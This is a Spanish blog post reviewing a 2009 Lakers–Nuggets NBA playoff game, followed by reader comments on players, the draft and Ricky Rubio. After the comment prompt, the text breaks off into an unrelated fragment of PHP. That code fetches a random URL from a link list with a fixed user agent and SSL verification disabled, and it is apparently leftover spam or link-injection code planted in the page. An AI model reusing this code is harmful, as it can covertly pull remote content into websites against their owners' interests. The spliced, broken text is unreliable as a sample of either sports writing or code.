Playoffs(29/05/09): Ordenando los elementos

30 de May de 2009 por Viva_Dirk

Por fin los Lakers rindieron como debe hacerlo un verdadero candidato al título. Kobe y Pau sumaron 55 puntos, 18 rebotes y 16 asistencias con un 20 de 32 en tiros, el banquillo aportó nada menos que 40 puntos,  de los cuales 20 vinieron de la mano de un renacido Odom que además capturó 8 rebotes.  Walton fue fundamental cubriendo los problemas de faltas de Ariza e incluso Bynum y Fisher, con una estadística aparentemente pobres, hicieron bien su trabajo. La de ayer fue, sin duda,  la actuación más serena, colectivamente hablando, de toda la postemporada y como consecuencia apenas existió rival.

Ante esto los Nuggets aguantaron 22 minutos, justo antes de que a Kobe le viniese una de esas inspiraciones divinas para dejar el marcar 53-40 al descanso para los amarillos. En esos 22 minutos fue JR Smith el que mantuvo a los de Karl en el partido con acciones marca de la casa sacando provecho de la única fase de desconcierto de los amarillos en la caótica dirección de Farmar, el único Laker no reencontrado anoche.

Decepcionantes Carmelo y Billups. El primero pese a sus 25 puntos estuvo fallón en el tiro y desastroso en la defensa tanto sobre Ariza como sobre Luke Walton. Y el base, pese a sus 7 finales de conferencia consecutivas, no tuvo nunca el ritmo del partido en sus manos. Al contrario, estuvo acelerado en todo momento y no pudo zafarse de la defensa de Kobe primero ni de la de Fisher( ¡oh cielos!) después. Sólo la ingente cantidad de tiros libres que unos benévolos árbitros les permitieron lanzar maquillaron sus intrascendentes actuaciones. Nula aportación del resto.

PREMIOS

MVP: Compartido para la parejita de Los Angeles, Kobe Bryant y Pau Gasol. El partido soñado en inteligencia y dirección.

Sorpresa: Lamar Odom con sus 20 puntos, 8 rebotes y unos impropios 4 de 4 en libres y 2 de 2 en triples. Mención aparte a Walton que estuvo soberbio tanto en defensa como en ataque.

Decepción: Ya los hemos nombrado, Carmelo Anthony y Chauncey Billups hicieron un 8 de 24 en tiros. Andaron perdidos todo el choque.

Mayor Esfuerzo en Vano: Para JR Smith que acabó el choque con 24 puntos y como única de las piezas ofensivas que estuvo por encima del 50% en tiros.

RAZONES PARA TRASNOCHAR

Cleveland VS Orlando: Se ha comentado que esta eliminatoria tiene dos séptimos partidos, por el hecho de que casi nadie piensa que a Lebron se le pueda escapar un partido definitivo en ‘The Q’. A las 02:30 horas española tendremos finalista de la NBA o vuelta a Cleveland.

Comenta

9 comentarios a esta entrada

  1. Jabho dice:
    #1

    Si yo fuera el propietario de los Denver empezaria buscar un traspaso para Melo ya, desde hoy. Joder, como te puedes estar jugando un anillo y defender como lo hace Melo. Vaya partidos de Ariza y Walton. Que vergüenza. Los grandes defienenden bien (jordan, kobe, wade, Duncan, Garnett, o inlcuso Lebron…). Luego unos días tiras mejor o peor, e inlcuso llego a entender que te juegues tiros forzados porque alguien tiene que hacerlo… tela de malo el partido en ataque de Melo mientras hubo partido, pero es que además en defensa es una madre… Sobrte un jugador así no se puede, no se debe, construir, una franquicia.

    Espero que veamos el duelo Lebron vs Kobe en la final…. De momento los Lakers siguen sin apasionarme la verdad a pesar del buen partido de anoche. Muy bien Pau, muy bien anoche

      Citar

  2. TheDeerHunter dice:
    #2

    Pues estos últimos partidos sí son de alto copete por parte de los Lakers.
    Decía ayer Daimiel que son el finalista con 65 victorias ganadas más criticado de la historia, y no me cabe duda de que así será. También hay que decir que se lo habían ganado a pulso. La de ayer es precísamente la imagen que debe de dar un equipo aspirante al anillo y no lo digo precísamente por haber barrido a su rival por 30 puntos.

    Quitando Farmar que no termina de arrancar, absolutamente toda la batería amarilla hizo un grandísimo trabajo, tanto ofensiva como defensivamente. Es evidente que me tendré que tragar todas las críticas a Jackson si al final logra el anillo, pero que fueran así las consecuencias de todos mis errores de apreciación en esta vida.

    Habiendo sido eliminado Boston, y sin despreciar ni a Cavs, ni a Magic pienso que estos Lakers son favoritos de largo y sólo ellos mismos pueden separarse del anillo. El problema es que han trasmitido tanta desconfianza que hasta que no lo demuestren no lo creeremos.

    Ahora habría que determinar a qué rival queremos en la final. A mí no me disgustan ninguno de los dos, ni para lo bueno ni para lo malo.

      Citar

  3. toni dice:
    #3

    Hay algo clarisimo, que cuando Odom tiene ganas de juntarse con Pau y Kobe, estos Lakers ganan.
    Habría que preguntarle a PJ si se va a reir mucho de nosotros, lo digo para levantarme o quedarme en la cama en estas finales.
    Vaya partido que han cuajado hoy los amarillos, dominando mucho, Kobe ha cojido las riendas durante 3 minutitos y los ha puesto +13 y de hay solo habia que controlar los triples de un JR Smith que se ha ido apagando poco a poco.
    Gasol muy bien hoy, no ha tenido ese puntito de flojo que aveces le ven, muy completo, moviendo y tirando bien. Quizás podria haber tirado algo mas pero ya estamos contentos con el 20 12 6 que se ha marcado.
    Kobe estelarisimo, sin comentarios, buenos porcentajes, repartiendo… Fenomenal.

    ¿Quien creeis que va a pasar en el duelo del Este?
    Yo digo que hoy lo finiquitan los Magic.

    ¿Cómo veriais el duelo Superman-Pau?
    Daimiel ha dicho en la retransmisión que en los duelos de la regular, no salió muy mal parado pero tengo mis dudas sobre lo que podria pasar en una final de NBA donde no estará Nelson al 100% y la mayoria de bolas serían para se las jugara Howard.

      Citar

  4. Txusma dice:
    #4

    Seria curioso que despues de pasarse todo los Playoffs dandole poquitas bolas a Howard ahora de repente utilizaran esa tactica. Aunq seria lo mas normal para intentar cargar de faltas a Pau o Bynum e ir limando poco a poco el juego interior de los Lakers. En todo caso, en los partidos q se han enfrentado Pau y Howard lo q si he visto es una defensa muy inteligente del español, provocando varias faltas en ataque y tb un ataque muy bueno percuetiendo una y otra vez sobre Howard para sacarlo del partido.

      Citar

  5. toni dice:
    #5

    Lo que está claro es que si nos encontramos esa final, Pau va a estar en el punto de mira.
    Y conociendo como se las gasta la prensa americana, van a necesitar bien poquito para crucificarlo.
    En cambio, si le va bien se va a consagrar como uno de los grandes de la liga (que ya es, pero a alguno aún le queda alguna duda o eso parece).
    ¿Creeis que PJ se la va a jugar dandole todos los minutos que no ha jugado Bynum en estas finales?
    Últimamente, se le ve algo más enchufado, pero con los 2 partidazos que viene haciendo Odom, creo que deberiamos aprovechar la racha.

    Señalar lo de Ariza, cada dia va a mejor y mejora en todos sus aspectos, tiene buenos porcentajes de tiro, defensa buenisima, intensidad… es completisimo.

    ¿Veis a Shannon Brown de base titular de LA?
    Falta pulirle varias cosas, pero Fisher no hace mas que pasearse por el pavellon y Farmar va dando flashes de lo gran jugador que puede llegar a ser, combinados con ataques que se come el solito o tiros sin ningun sentido.

      Citar

  6. kantonyo dice:
    #6

    Yo creo que Lakers se va a tirar de cabeza en el Draft a por un base intentando cazar a uno de los dos californianos que tanto nombre tienen en LA. Posiblemente Holiday va a quedar mucho más arriba por lo que el base de UCLA, Darren Collison puede ser una buena elección para los amarillos. Aunque no es el típico base que le gusta a Phil.

      Citar

  7. toni dice:
    #7

    ¡Pidieron ayuda y apareció Superman!
    ¡40 puntazos!

    ¿Cómo veriais lo de Ricky en NY?
    ¿Buscarían un traspaso para Duhon si consiguieran a Ricky?
    Yo sigo sin ver claro lo de Ricky en la NBA…

      Citar

  8. kantonyo dice:
    #8

    Para mi la opción de NY sería la mejor sin lugar a dudas. Es el mayor mercado americano, la franquicia más poderosa económicamente. Lo peor es que no tienen una apuesta deportiva definida, pero tambien esto puede ser positivo, ya que podrían preparar la plantilla basandose en Ricky.

      Citar

  9. Txusma dice:
    #9

    Bueno, con la llegada de Walsh y D’Antoni los Knicks parecen tener un plan. Un plan q no creo q pase por Ricky Rubio sino por LeBron James. Eso si, Ricky casaria a la perfeccion en el estilo de juego del ex-entrenador de los Suns y seguro q seria un gran compañero de LeBron. De cualquier manera parece el destino ideal. A ver como seria ese trade Knicks-Memphis. Lee x Rubio?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>